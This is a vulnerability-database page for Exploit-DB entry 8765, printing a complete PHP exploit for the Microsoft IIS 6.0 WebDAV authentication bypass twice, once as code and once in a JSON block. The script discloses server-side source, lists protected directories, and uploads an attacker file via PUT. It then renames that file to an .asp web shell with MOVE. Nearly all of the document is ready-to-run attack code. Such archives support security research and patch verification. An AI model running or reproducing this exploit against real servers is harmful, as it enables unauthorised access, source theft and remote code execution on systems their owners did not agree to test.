Search...

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit php

2009-05-22T00:00:00

ID EDB-ID:8765
Type exploitdb
Reporter racle
Modified 2009-05-22T00:00:00

Description

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php). Remote exploit for windows platform

                                        
                                            &lt;?

print_r('
********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********
                                                         
       Usage: php '.$argv[0].' source/path/put host path    
       Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp        
       Example2: php '.$argv[0].' path www.tian6.com /secret/
       Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
');

//verification du debut
if($argv[1]!="source"&&$argv[1]!="path"&&$argv[1]!="put"){echo "Choose a action,source or path or put.";die;}
else {$action=$argv[1];}

if(stristr($argv[2],"http://")){echo "No http:// in the host!";die;}
else{$host=$argv[2];}

if(stristr($argv[3],"/")==false){echo "Where is the / ?";die;}
else{$path=$argv[3];}


//sent
function sent($sock)   
{   
global  $host, $html;   
$ock=fsockopen(gethostbyname($host),'80');   
if (!$ock) {   
echo 'No response from '.$host; die;   
}   
fputs($ock,$sock);   
$html='';   
while (!feof($ock)) {   
$html.=fgets($ock);   
}   
fclose($ock);   
}   

if($action=="source"){
	$position=strrpos($path,"/");
    $path=substr_replace($path,"%c0%af/",$position,1);
	$sock="GET ".$path." HTTP/1.1\r\n";
    $sock.="Translate: f\r\n";
	$sock.="Host: ".$host."\r\n";
    $sock.="Connection:close\r\n\r\n";
	sent($sock);
	echo $html;
	die;
	}


if($action=="path"){
	$position=strrpos($path,"/");
    $path=substr_replace($path,"%c0%af",$position,0);
	$sock="PROPFIND  ".$path." HTTP/1.1\r\n";
	$sock.="Host: ".$host."\r\n";
    $sock.="Connection:close\r\n";
	$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
	$sock.="Content-Length: 0\r\n\r\n";
    $sock.='&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;D:propfind xmlns:D="DAV:"&gt;&lt;D:prop xmlns:R="http://www.foo.bar/boxschema/"&gt;&lt;R:bigbox/&gt;&lt;R:author/&gt;&lt;R:DingALing/&gt;&lt;R:Random/&gt;&lt;/D:prop&gt;&lt;/D:propfind&gt;';
    sent($sock);
	$bur=explode("&lt;a:href&gt;",$html);
    foreach($bur as $line){$no=strpos($line,"&lt;");$resultat.=substr($line,0,$no)."\n";}
    echo $resultat;
	die;
    }


if($action=="put"){
	echo "Remember,keep urfile in type txt!\r\n\r\n";
     $fp = fopen("test.txt", 'r');
	 if($fp!=false){
     while (false!==($char = fgets($fp))) {
     $fir1 .= $char;    # fix: hoahongtim Team: hvaonline.net
     }
     fclose($fp);
	$position=strrpos($path,"/");
    $path=substr_replace($path,"%c0%af",$position,0);
    $sock="PUT ".$path."test.txt HTTP/1.1\r\n";
	$sock.="Host: ".$host."\r\n";
	$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
	$sock.="Connection:close\r\n";
	$sock.="Content-Length: ".strlen($fir1)."\r\n\r\n";
    $sock.="".$fir1."\r\n";
   	echo $sock; sent($sock);sleep(2);
	$sock="MOVE ".$path."test.txt HTTP/1.1\r\n";
    $sock.="Host: ".$host."\r\n";
    $sock.="Connection:close\r\n";
	$sock.="Destination: ".$path."racle.asp\n\n";
    sent($sock);
	echo "Be cool,man! Webshell is http://".$host.$path."racle.asp";
	die;}
	else{die;}
	}

# milw0rm.com [2009-05-22]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:8765", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit php", "description": "Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php). Remote exploit for windows platform", "published": "2009-05-22T00:00:00", "modified": "2009-05-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/8765/", "reporter": "racle", "references": [], "cvelist": [], "lastseen": "2016-02-01T08:07:02", "viewCount": 37, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-02-01T08:07:02", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-01T08:07:02", "rev": 2}, "vulnersScore": 0.0}, "sourceHref": "https://www.exploit-db.com/download/8765/", "sourceData": "<?\n\nprint_r('\n******** IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org ********\n \n Usage: php '.$argv[0].' source/path/put host path \n Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp \n Example2: php '.$argv[0].' path www.tian6.com /secret/\n Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt)\n****************************************************************\n');\n\n//verification du debut\nif($argv[1]!=\"source\"&&$argv[1]!=\"path\"&&$argv[1]!=\"put\"){echo \"Choose a action,source or path or put.\";die;}\nelse {$action=$argv[1];}\n\nif(stristr($argv[2],\"http://\")){echo \"No http:// in the host!\";die;}\nelse{$host=$argv[2];}\n\nif(stristr($argv[3],\"/\")==false){echo \"Where is the / ?\";die;}\nelse{$path=$argv[3];}\n\n\n//sent\nfunction sent($sock) \n{ \nglobal $host, $html; \n$ock=fsockopen(gethostbyname($host),'80'); \nif (!$ock) { \necho 'No response from '.$host; die; \n} \nfputs($ock,$sock); \n$html=''; \nwhile (!feof($ock)) { \n$html.=fgets($ock); \n} \nfclose($ock); \n} \n\nif($action==\"source\"){\n\t$position=strrpos($path,\"/\");\n $path=substr_replace($path,\"%c0%af/\",$position,1);\n\t$sock=\"GET \".$path.\" HTTP/1.1\\r\\n\";\n $sock.=\"Translate: f\\r\\n\";\n\t$sock.=\"Host: \".$host.\"\\r\\n\";\n $sock.=\"Connection:close\\r\\n\\r\\n\";\n\tsent($sock);\n\techo $html;\n\tdie;\n\t}\n\n\nif($action==\"path\"){\n\t$position=strrpos($path,\"/\");\n $path=substr_replace($path,\"%c0%af\",$position,0);\n\t$sock=\"PROPFIND \".$path.\" HTTP/1.1\\r\\n\";\n\t$sock.=\"Host: \".$host.\"\\r\\n\";\n $sock.=\"Connection:close\\r\\n\";\n\t$sock.='Content-Type: text/xml; charset=\"utf-8\"'.\"\\r\\n\";\n\t$sock.=\"Content-Length: 0\\r\\n\\r\\n\";\n $sock.='<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://www.foo.bar/boxschema/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>';\n sent($sock);\n\t$bur=explode(\"<a:href>\",$html);\n foreach($bur as $line){$no=strpos($line,\"<\");$resultat.=substr($line,0,$no).\"\\n\";}\n echo $resultat;\n\tdie;\n }\n\n\nif($action==\"put\"){\n\techo \"Remember,keep urfile in type txt!\\r\\n\\r\\n\";\n $fp = fopen(\"test.txt\", 'r');\n\t if($fp!=false){\n while (false!==($char = fgets($fp))) {\n $fir1 .= $char; # fix: hoahongtim Team: hvaonline.net\n }\n fclose($fp);\n\t$position=strrpos($path,\"/\");\n $path=substr_replace($path,\"%c0%af\",$position,0);\n $sock=\"PUT \".$path.\"test.txt HTTP/1.1\\r\\n\";\n\t$sock.=\"Host: \".$host.\"\\r\\n\";\n\t$sock.='Content-Type: text/xml; charset=\"utf-8\"'.\"\\r\\n\";\n\t$sock.=\"Connection:close\\r\\n\";\n\t$sock.=\"Content-Length: \".strlen($fir1).\"\\r\\n\\r\\n\";\n $sock.=\"\".$fir1.\"\\r\\n\";\n \techo $sock; sent($sock);sleep(2);\n\t$sock=\"MOVE \".$path.\"test.txt HTTP/1.1\\r\\n\";\n $sock.=\"Host: \".$host.\"\\r\\n\";\n $sock.=\"Connection:close\\r\\n\";\n\t$sock.=\"Destination: \".$path.\"racle.asp\\n\\n\";\n sent($sock);\n\techo \"Be cool,man! Webshell is http://\".$host.$path.\"racle.asp\";\n\tdie;}\n\telse{die;}\n\t}\n\n# milw0rm.com [2009-05-22]\n", "osvdbidlist": []}